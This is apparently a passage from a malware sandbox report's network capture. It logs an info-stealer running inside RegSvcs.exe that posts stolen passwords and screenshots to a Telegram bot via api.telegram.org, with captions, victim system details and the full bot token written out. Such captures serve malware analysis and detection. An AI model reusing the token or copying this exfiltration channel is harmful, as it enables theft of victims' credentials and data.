6f a7 95 eb 85 f0 34 6f ac 7f 56 52 3e 70 d9 cc 5e fc 29 26 e0 51 25 99 fe 6a fb d4 a0 79 d3 Data Ascii: j_`OAU&v1m$`{f_S+f's};%ft.AW6XN=3t_sF@+faCf'\|}{+,5}&ei Y#+ZLG&Sg^Uj}Y!8zqGo4oVR>p^)&Q%jy
2022-04-08 10:12:56 UTC	512	IN	Data Raw: 42 c3 a5 5e 75 f5 87 a7 5e f5 54 2d b9 a0 30 9c d7 79 b5 21 dd 2e ef 8c d7 5e c1 16 ca bb 39 c1 1f 2a 9f 4a b0 e6 0c 39 b8 a6 b2 5f 57 3f f9 b2 66 d1 c7 a9 25 5b 0c 1b 93 12 5e ce d2 df da ee 9d be e6 a0 bd ee b2 59 26 1a 6f fc 2b 34 ce 53 4c ef 2d f4 fd da b4 90 6c db f0 30 39 b2 bb af e9 7e 46 ca ce 8a 2d b5 ba 4b f7 69 ed d0 7e fd 65 f8 ae f7 c5 63 82 df 0f 9c 14 3b 56 e5 ac 20 9f b0 ad bb d2 3d 51 73 44 e5 cc e7 65 25 44 91 ea 92 d7 b3 b4 9a e7 1f 17 e4 f6 85 7b 17 cf ec ef 6e de cf b0 57 94 de b6 be be 3d df 94 79 e0 e6 f9 d6 c7 ed 4b 9d 36 0d df f1 1a b0 fd 82 db f6 4a 9e e8 5b e2 a1 bd 55 7b ec 51 a4 4b b9 05 36 67 d9 c5 05 4e 2b 4a 96 a6 19 af 36 eb da 56 5d 6a f8 27 48 69 c2 81 73 29 fd 93 6e c1 a5 e2 bb 53 33 7d ef ed fd 7e 49 d7 fa f3 48 d4 c3 Data Ascii: B^u^T-0y!.^9*J9_W?f%[^Y&o+4SL-l09~F-Ki~ec;V =QsDe%D{nW=yK6J[U{QK6gN+J6V]j'His)nS3}~IH
2022-04-08 10:12:56 UTC	528	IN	Data Raw: e1 f1 f4 9b 7c 98 ba e6 6e 48 fc 25 c4 d1 77 74 31 7d 5a 56 ad 7d f0 a8 c6 4d ed a9 22 2c ca 70 f5 ae 6a 1a 30 a6 d4 d3 98 eb 92 b3 9e fa 4e 32 ef f1 b9 e7 84 63 e2 01 d0 b9 e0 30 99 b2 43 f0 c0 99 95 d4 eb b9 1d 9e be 84 58 3a 39 c9 3c 74 de 2e aa aa 0b de 24 96 88 da 53 45 90 95 61 6d 43 0b fd 76 f1 de a4 77 9a 49 19 fe 35 f5 7c 66 1b 0d 98 69 ce be 1a 5c cb c2 01 60 ca 3c c0 25 13 0e 52 97 91 eb 84 8b 3f 96 9e 79 eb 69 6e e1 09 ed 83 4a 16 7e d5 9e 2a 82 a6 0c df 58 e7 fc e0 e4 7b bb d3 4c 46 e7 ec 75 d4 67 c2 01 ed df 4d 87 e7 7f d1 00 b8 68 8a fe 79 00 19 01 10 4d e6 1b a6 94 d1 9e 0a 7b b7 b6 92 a5 f6 54 61 bb 32 3c 58 d9 48 b7 cf de 99 fe 58 33 28 00 2e 9a 7c c2 7f 00 74 33 64 3d 80 df 47 80 44 74 75 c2 c4 46 65 28 5b ed a9 c2 56 65 c8 6a af 7b 6e Data Ascii: \|nH%wt1}ZV}M",pj0N2c0CX:9<t.$SEamCvwI5\|fi\`<%R?yinJ~*X{LFugMhyM{Ta2<XHX3(.\|t3d=GDtuFe([Vej{n

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49172	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:10 UTC	534	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da195bfbe5defb Host: api.telegram.org Content-Length: 1036 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:13:10 UTC	535	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:10 UTC	535	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 62 66 62 65 35 64 65 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 35 62 66 62 65 35 64 65 66 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 31 0a 4f 53 46 75 6c 6c Data Ascii: -----------------------------8da195bfbe5defbContent-Disposition: form-data; name="chat_id"5019146869-----------------------------8da195bfbe5defbContent-Disposition: form-data; name="caption"New PW Recovered!User Name: user/082561OSFull
2022-04-08 10:13:10 UTC	536	OUT	Data Raw: 66 62 65 35 64 65 66 62 2d 2d 0d 0a Data Ascii: fbe5defb--
2022-04-08 10:13:10 UTC	536	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:10 GMT Content-Type: application/json Content-Length: 645 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":122,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412790,"document":{"file_name":"user-082561 2022-04-08 12-31-58.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAN6YlAKtuP6HZGfIyQBdWIGVzB48OIAAu4KAAJAlIBSUoAWAAEKxBoAASME","file_unique_id":"AgAD7goAAkCUgFI","file_size":457},"caption":"New PW Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.22	49181	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:13:58 UTC	1209	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19703f385b46 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue Connection: Keep-Alive
2022-04-08 10:13:58 UTC	1210	IN	HTTP/1.1 100 Continue
2022-04-08 10:13:58 UTC	1210	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 30 33 66 33 38 35 62 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 30 33 66 33 38 35 62 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da19703f385b46Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da19703f385b46Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:13:58 UTC	1211	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:13:58 UTC	1226	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:13:58 UTC	1242	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
2022-04-08 10:13:58 UTC	1258	OUT	Data Raw: 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d3 23 fb a7 ea 7f 9d 1b c7 a3 7f df 26 9a 8e 02 f4 6e a7 f8 4f ad 00 4b 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 Data Ascii: M&Lto\|j8>-FL=4o\|}F#&nOKE3xoz7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7F
2022-04-08 10:13:58 UTC	1274	OUT	Data Raw: fe e9 fa 9f e7 46 d3 fd f6 fd 3f c2 9a 8a 76 fd f6 ea 7d 3d 68 02 5a 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 29 9b 4f f7 db f4 ff 00 0a 36 9f ef b7 e9 fe 14 00 fa 64 7f 74 fd 4f f3 a3 69 fe fb 7e 9f e1 4d 45 3b 7e fb 75 3e 9e b4 01 2d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 14 cd a7 fb ed fa 7f 85 1b 4f f7 db f4 ff 00 0a 00 7d 32 3f ba 7e a7 f9 d1 b4 ff 00 7d bf 4f f0 a6 a2 9d bf 7d ba 9f 4f 5a 00 96 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 8a 66 d3 fd f6 fd 3f c2 8d a7 fb ed fa 7f 85 00 3e 99 1f dd 3f 53 fc e8 da 7f be df a7 f8 53 51 4e df be dd 4f a7 ad 00 4b Data Ascii: F?v}=hZ)O6)O6)O6dtOi~ME;~u>-O}O}O}2?~}O}OZf?>f?>f?>?SSQNOK
2022-04-08 10:13:58 UTC	1289	OUT	Data Raw: e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 c8 fe e9 fa 9f e7 46 f1 e8 df f7 c9 a6 a3 80 bd 1b a9 fe 13 eb 40 12 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 32 3f ba 7e a7 f9 d1 bc 7a 37 fd f2 69 a8 e0 2f 46 ea 7f 84 fa d0 04 b4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 45 33 78 f4 6f fb e4 d1 bc 7a 37 fd f2 68 01 f4 53 37 8f 46 ff 00 be 4d 1b c7 a3 7f df 26 80 1f 4c 8f ee 9f a9 fe 74 6f 1e 8d ff 00 7c 9a 6a 38 0b d1 ba 9f e1 3e b4 01 2d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 c9 a0 07 d1 4c de 3d 1b fe f9 34 6f 1e 8d ff 00 7c 9a 00 7d 14 cd e3 d1 bf ef 93 46 f1 e8 df f7 Data Ascii: z7hS7FM&E3xoz7hF@L=4o\|}FL=4o\|}2?~z7i/FS7FM&E3xoz7hS7FM&Lto\|j8>-FL=4o\|}F
2022-04-08 10:13:58 UTC	1305	OUT	Data Raw: 45 14 00 53 23 fb a7 ea 7f 9d 3e 99 1f dd 3f 53 fc e8 01 f4 51 45 00 14 51 45 00 14 51 45 00 14 c8 fe e9 fa 9f e7 4f a6 47 f7 4f d4 ff 00 3a 00 7d 14 51 40 05 14 51 40 05 14 51 40 05 32 3f ba 7e a7 f9 d3 e9 91 fd d3 f5 3f ce 80 1f 55 67 ff 00 8f d8 7f eb 9b ff 00 35 ab 55 56 7f f8 fd 87 fe b9 bf f3 5a 00 6b d5 3b 7f f9 08 3f fc 0b f9 47 57 1e a9 db ff 00 c8 41 ff 00 e0 5f ca 3a a1 13 6c 6f f9 ea ff 00 90 ff 00 0a 36 37 fc f5 7f c8 7f 85 67 eb 1e 64 71 99 a3 33 a9 50 0e f5 93 09 1e 0f 25 94 1c b7 1d b0 7a 76 a4 be 2f 15 dc 13 2b 4e aa d2 26 e9 0c 9f bb 0a 78 db b4 1e fe a4 77 eb 48 0d 1d 8d ff 00 3d 5f f2 1f e1 56 6d 14 fd 9c 7c ed f7 9b d3 d4 fb 57 3f 6f 73 2b 5d 24 f3 a3 94 92 e1 a2 42 b3 b0 db 82 40 05 3a 76 eb c9 e6 ba 2b 3f f8 f7 1f ef 37 fe 84 68 e8 Data Ascii: ES#>?SQEQEQEOGO:}Q@Q@Q@2?~?Ug5UVZk;?GWA_:lo67gdq3P%zv/+N&xwH=_Vm\|W?os+]$B@:v+?7h
2022-04-08 10:13:58 UTC	1321	OUT	Data Raw: d4 94 da 23 b9 3f b8 ff 00 81 a7 fe 86 2a 36 fb d2 ff 00 be bf c9 69 6e 0f ee 0f fb e9 ff 00 a1 ad 34 fd e9 7f de 5f e4 b5 e9 1c 05 dd 1c ed d3 94 7f d3 59 bf f4 6b d5 8b b9 0a 59 cc ea 79 58 d8 8f ca aa e9 df 2d 92 0f f6 e4 ff 00 d1 8d 4e be 7c 58 5c 7f d7 26 fe 55 94 96 8c bb e8 37 50 b6 92 44 09 6c ee 8d 17 0a aa c4 64 0e d5 91 79 35 ed e5 c5 ad bc 2c f0 ae dc c9 2a 12 3a 75 27 1e df 99 ad 0d 62 fd ed 62 b8 10 9c 4c e4 a2 11 fc 23 b9 aa 1a 4d cc 96 b6 50 dc 09 3c cd 87 64 9c 11 8f 6f 7e 31 cd 72 49 f2 ca eb e6 64 da b9 78 5e 44 14 2c 79 65 51 80 58 e4 9f af bd 3a 19 37 ea 4a dd 33 6c bf fa 1b d5 b9 a2 b4 bd 89 66 7b 71 28 71 90 f1 70 f8 fe 75 59 2c a3 b6 9a 39 a3 9e 49 16 44 d8 a9 22 e0 a8 04 9f e6 de 95 b4 13 e6 1a 4d 32 e6 ea a9 7a 73 3c 1f ee c9 fc Data Ascii: #?6in4_YkYyX-N\|X\&U7PDldy5,:u'bbL#MP<do~1rIdx^D,yeQX:7J3lf{q(qpuY,9ID"M2zs<
2022-04-08 10:13:58 UTC	1324	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 30 33 66 33 38 35 62 34 36 2d 2d 0d 0a Data Ascii: -----------------------------8da19703f385b46--
2022-04-08 10:13:59 UTC	1324	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 08 Apr 2022 10:13:59 GMT Content-Type: application/json Content-Length: 833 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":131,"from":{"id":5008280971,"is_bot":true,"first_name":"gods_child_bot","username":"gods_childbot"},"chat":{"id":5019146869,"first_name":"Love","last_name":"Word","username":"tgman1","type":"private"},"date":1649412839,"document":{"file_name":"user-082561 2022-04-08 02-58-31.jpeg","mime_type":"image/jpeg","thumb":{"file_id":"AAMCBAADGQMAA4NiUArmArU1j6oV5QsmadA02ulpLAAC9woAAkCUgFJ1WAVyuYeHogEAB20AAyME","file_unique_id":"AQAD9woAAkCUgFJy","file_size":14418,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAODYlAK5gK1NY-qFeULJmnQNNrpaSwAAvcKAAJAlIBSdVgFcrmHh6IjBA","file_unique_id":"AgAD9woAAkCUgFI","file_size":116302},"caption":"New Screenshot Recovered!\n\nUser Name: user/082561\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.22	49182	149.154.167.220	443	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-08 10:14:04 UTC	1325	OUT	POST /bot5008280971:AAFemDWjmiprlWos2qK6VdoxhprMtzrVZRU/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8da19730abb6823 Host: api.telegram.org Content-Length: 116890 Expect: 100-continue
2022-04-08 10:14:04 UTC	1325	IN	HTTP/1.1 100 Continue
2022-04-08 10:14:04 UTC	1325	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 33 30 61 62 62 36 38 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 35 30 31 39 31 34 36 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 31 39 37 33 30 61 62 62 36 38 32 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 63 72 65 65 6e 73 68 6f 74 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 30 38 32 35 36 Data Ascii: -----------------------------8da19730abb6823Content-Disposition: form-data; name="chat_id"5019146869-----------------------------8da19730abb6823Content-Disposition: form-data; name="caption"New Screenshot Recovered!User Name: user/08256
2022-04-08 10:14:04 UTC	1326	OUT	Data Raw: 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ec 2e af 8c 4a cf bd 22 8c 36 cd cd 19 7c 91 d7 80 46 07 6a 85 2f a4 96 f0 da 47 77 03 4c 06 e2 05 b3 10 07 ae 77 e3 bd 55 d4 6e 85 b6 97 2b 6d 0e cd 24 aa aa 7b 9f 31 a9 ba 03 c3 81 b5 55 25 b8 db 21 23 f8 b1 d4 7e 1c fe b5 8f 3f bd 63 2e 6d 6c 6b da dd 19 6d 2d 25 75 f9 ae 11 4f cb d0 12 bb bf 2e 29 d7 77 22 d6 1f 30 ae ee 7a 67 1d 89 fe 95 57 4e 39 Data Ascii: 4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?.J"6\|Fj/GwLwUn+m${1U%!#~?c.mlkm-%uO.)w"0zgWN9
2022-04-08 10:14:04 UTC	1342	OUT	Data Raw: da 5b a5 b5 d8 57 44 07 13 3d db 4d 23 12 73 ce 51 7d 7f 41 5a 07 fd 62 9f 63 fd 28 cd 14 80 a1 aa 42 b3 bc 48 e2 6c 00 5b f7 52 04 3c 32 f7 c8 e3 fc fb d6 34 96 f7 12 ea b1 dc 03 2b a5 b6 e0 a8 5c 64 2b 80 31 bb 7f 5f 94 f3 d7 d6 ba 39 ed ad ee 54 0b 88 23 94 0e 40 91 03 63 f3 a8 7f b2 f4 ef f9 f0 b5 ff 00 bf 2b fe 15 49 a1 6a 67 e8 11 18 af af c1 59 01 65 46 fd e4 9b cf 2c e7 ae 4f 15 1a 69 57 43 4c 36 de 58 da 60 2c 53 70 ff 00 5b b7 6e 3e 9d 0f d4 56 d4 16 b6 d6 bb be cf 6f 14 3b be f7 96 81 73 f5 c5 4b 9a 4f 56 35 a1 90 96 13 7f 6c 8b 89 56 62 14 2f 96 e8 63 da a0 2e 0a 9c fc dd 73 d3 8e 6a ac b6 f1 69 da 7d 87 da e0 8b cb 45 6f 36 26 74 52 64 c0 c3 72 40 24 60 8e 0e 79 e2 ba 1c d1 9a 4c 11 cf c1 a7 4f 22 e9 ad 2c 73 f9 71 c0 80 79 7b 33 1b 03 92 4e Data Ascii: [WD=M#sQ}AZbc(BHl[R<24+\d+1_9T#@c+IjgYeF,OiWCL6X`,Sp[n>Vo;sKOV5lVb/c.sji}Eo6&tRdr@$`yLO",sqy{3N
2022-04-08 10:14:04 UTC	1358	OUT	Data Raw: bf 4f f0 a3 69 fe fb 7e 9f e1 40 0f a6 47 f7 4f d4 ff 00 3a 36 9f ef b7 e9 fe 14 d4 53 b7 ef b7 53 e9 eb 40 12 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d1 4c da 7f be df a7 f8 51 b4 ff 00 7d bf 4f f0 a0 07 d3 23 fb a7 ea 7f 9d 1b 4f f7 db f4 ff 00 0a 6a 29 db f7 db a9 f4 f5 a0 09 68 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e8 a6 6d 3f df 6f d3 fc 28 da 7f be df a7 f8 50 03 e9 91 fd d3 f5 3f ce 8d a7 fb ed fa 7f 85 35 14 ed fb ed d4 fa 7a d0 04 b4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 53 36 9f ef b7 e9 fe 14 6d 3f df 6f d3 fc 28 01 f4 c8 fe e9 fa 9f e7 46 d3 fd f6 fd 3f Data Ascii: Oi~@GO:6SS@LQ}OLQ}OLQ}O#Oj)hm?o(Pm?o(Pm?o(P?5zS6m?o(S6m?o(S6m?o(F?
